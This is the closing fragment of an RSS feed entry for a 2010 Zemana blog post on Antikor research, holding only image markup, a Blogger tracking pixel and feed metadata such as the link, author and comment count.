&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/_W_bgBWwE23o/S7tweQGw1nI/AAAAAAAAAPU/gaVwcPNMG5o/s1600/OllyScript.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="180" src="http://3.bp.blogspot.com/_W_bgBWwE23o/S7tweQGw1nI/AAAAAAAAAPU/gaVwcPNMG5o/s400/OllyScript.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1109329877337930296-9083942178298119388?l=blog.zemana.com' alt='' /&gt;&lt;/div&gt;</description><link>http://feedproxy.google.com/~r/blog_zemana/~3/USFEMqF1t_0/antikor-ugs-research-part1.html</link><author>erkan.arnaudov@zemana.com (Erkan Arnaudov)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/_W_bgBWwE23o/S4vrmk_M1rI/AAAAAAAAALs/FWCtKIhRsTM/s72-c/Antikor_alert.png" height="72" width="72" /><thr:total>26</thr:total><feedburner:origLink>http://blog.zemana.com/2010/03/antikor-ugs-research-part1.html</feedburner:origLink></item></channel></rss>
